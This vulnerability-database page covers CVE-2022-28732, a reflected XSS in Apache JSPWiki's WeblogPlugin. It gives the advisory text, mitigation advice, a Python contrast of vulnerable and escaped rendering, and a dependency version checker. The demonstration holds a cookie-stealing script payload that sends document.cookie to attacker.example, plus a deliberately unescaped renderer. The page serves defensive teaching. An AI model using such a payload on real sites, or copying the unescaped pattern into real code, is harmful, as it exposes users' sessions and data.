VYPR
Moderate severity · NVD Advisory · Published Aug 4, 2022 · Updated Aug 3, 2024

Apache JSPWiki Cross-site scripting vulnerability on WeblogPlugin

CVE-2022-28732

Description

A carefully crafted request on WeblogPlugin could trigger an XSS vulnerability on Apache JSPWiki, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.3 or later.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Apache JSPWiki WeblogPlugin is vulnerable to reflected cross-site scripting (XSS) via a crafted request, enabling JavaScript execution in a victim's browser and potential theft of sensitive data.

Description

CVE-2022-28732 is a cross-site scripting (XSS) vulnerability in the WeblogPlugin component of Apache JSPWiki. A carefully crafted request processed by the plugin carries attacker-controlled input that the plugin emits into the rendered page without adequate output encoding, so the attacker can inject arbitrary HTML or JavaScript into the wiki interface [1][3].
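To make the bug class concrete, the following Python example (added here; it is not JSPWiki's code and does not reproduce the WeblogPlugin code path, which the advisory does not detail) contrasts a hypothetical page-rendering function that concatenates a request parameter straight into HTML with a hardened version that validates the value's shape and encodes it for the HTML element and attribute contexts. The payload string, the `data-start` attribute and the date-shaped parameter are all constructed for the demonstration and are not taken from the advisory.

```python
import html
import re

# Constructed probe payload for the demonstration; not taken from the advisory.
# It closes the quoted attribute it lands in, then injects a script element.
PAYLOAD = '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>'

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
DATE_SHAPE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def render_vulnerable(start: str) -> str:
    """Hypothetical rendering that reflects the request value without encoding.

    This is the bug class the advisory describes: attacker-controlled request
    data is written verbatim into both an attribute and element text.
    """
    return ('<div class="weblog" data-start="' + start + '">'
            'Entries from ' + start + '</div>')


def render_fixed(start: str) -> str:
    """Hardened form: validate the shape, then encode for the output context.

    html.escape(..., quote=True) encodes & < > " and ', so the value can
    neither break out of the quoted attribute nor start a new element.
    Validation is defense in depth: a value that is not date-shaped is
    rejected before it reaches the template at all.
    """
    if not DATE_SHAPE.fullmatch(start):
        raise ValueError("start must look like YYYY-MM-DD")
    safe = html.escape(start, quote=True)
    return ('<div class="weblog" data-start="' + safe + '">'
            'Entries from ' + safe + '</div>')


def render_fixed_encoding_only(value: str) -> str:
    """Encoding alone, for parameters that legitimately carry free text."""
    safe = html.escape(value, quote=True)
    return '<div class="weblog">Entries from ' + safe + '</div>'


def is_rejected(value: str) -> bool:
    """True when the validating renderer refuses the value."""
    try:
        render_fixed(value)
    except ValueError:
        return True
    return False


def survives_as_markup(rendered: str) -> bool:
    """Crude check used only here: does a literal <script tag remain in the output?"""
    return SCRIPT_TAG.search(rendered) is not None


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(PAYLOAD))
    print("encoded   :", render_fixed_encoding_only(PAYLOAD))
    print("validated :", "rejected" if is_rejected(PAYLOAD) else "accepted")
```

The encoding-only variant is the minimum fix for this class of bug; the validating variant shows the additional check you would want for a parameter whose legitimate values have a fixed shape.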

Exploitation

An attacker exploits this vulnerability by getting a JSPWiki instance running version 2.11.2 or earlier to process a malicious request, typically by luring a victim into following a crafted link or loading a page that issues the request on the victim's behalf. The advisory does not state any authentication requirement beyond the victim's normal access to the wiki. When WeblogPlugin handles the request it renders the injected payload into the page, and the payload executes in the context of the victim's browser session [2][3].

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript in the victim's browser, within the wiki's origin. This can disclose sensitive information: cookies that are not flagged HttpOnly (which may include session tokens), page content the victim is authorized to read, and anything else the wiki exposes to script. The attacker can also drive the application as the victim, for example editing wiki content, which amounts to privilege escalation when the victim holds higher privileges than the attacker [1][3].

Mitigation

The vulnerability is fixed in Apache JSPWiki version 2.11.3 and later; users should upgrade without delay. The advisory describes no workaround for older versions, so upgrading is the only documented remediation. The issue was reported by Wang Ran from JDArmy [3].

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                                   Affected versions   Patched versions
org.apache.jspwiki:jspwiki-main (Maven)   < 2.11.3            2.11.3
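A practitioner's first question is whether a given build pulls in a vulnerable jspwiki-main. The following Python example (added here; not code from the advisory or from the JSPWiki project) scans text shaped like the output of the Maven goal `mvn dependency:list` for the org.apache.jspwiki:jspwiki-main coordinate and compares the version numerically against the 2.11.3 threshold in the table above, so that 2.11.10 is treated as newer than 2.11.3 and a 2.11.3-SNAPSHOT pre-release as older. The dependency-list lines are constructed sample input, not real build output.

```python
import re
from typing import Optional, Tuple

# First patched release from the advisory's "Patched versions" column; anything below is affected.
PATCHED = (2, 11, 3)

COORD_RE = re.compile(r"org\.apache\.jspwiki:jspwiki-main:jar:([0-9A-Za-z.+\-]+):")

# Constructed sample, shaped like `mvn dependency:list` output; not real build output.
SAMPLE_DEPENDENCY_LIST = """\
[INFO] The following files have been resolved:
[INFO]    org.apache.jspwiki:jspwiki-main:jar:2.11.2:compile
[INFO]    org.apache.jspwiki:jspwiki-api:jar:2.11.2:compile
[INFO]    org.apache.commons:commons-lang3:jar:3.12.0:compile
"""


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '2.11.2' or '2.11.3-SNAPSHOT' into a tuple that compares numerically.

    The trailing element is 1 for a release and 0 for anything with a
    pre-release suffix or a non-numeric segment, so 2.11.3-SNAPSHOT sorts
    before 2.11.3 and 2.11.10 sorts after 2.11.3 (a plain string comparison
    would get the latter wrong).
    """
    core, *suffix = re.split(r"[-+]", text, maxsplit=1)
    numeric = []
    prerelease = bool(suffix)
    for segment in core.split("."):
        if segment.isdigit():
            numeric.append(int(segment))
        else:
            prerelease = True
            break
    return tuple(numeric) + ((0,) if prerelease else (1,))


def find_jspwiki_main_version(dependency_list: str) -> Optional[str]:
    """Return the jspwiki-main version string found in the text, or None."""
    match = COORD_RE.search(dependency_list)
    return match.group(1) if match else None


def is_affected(version: str) -> bool:
    """True when the version is below the first patched release."""
    return parse_version(version) < PATCHED + (1,)


def check_dependency_list(dependency_list: str) -> Optional[bool]:
    """None if jspwiki-main is absent, otherwise whether the found version is affected."""
    version = find_jspwiki_main_version(dependency_list)
    return None if version is None else is_affected(version)


if __name__ == "__main__":
    found = find_jspwiki_main_version(SAMPLE_DEPENDENCY_LIST)
    if found is None:
        print("jspwiki-main not present")
    else:
        print(f"jspwiki-main {found}: {'AFFECTED' if is_affected(found) else 'patched'}")
```

Pipe real `mvn dependency:list` output into `check_dependency_list` to use it on an actual build; for deployed WAR files, the same comparison applies to the version in the bundled jspwiki-main jar's file name.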

Affected products: 2
Patches: 0 (no patches discovered yet)
References: 3
News mentions: 0 (no linked articles in our index yet)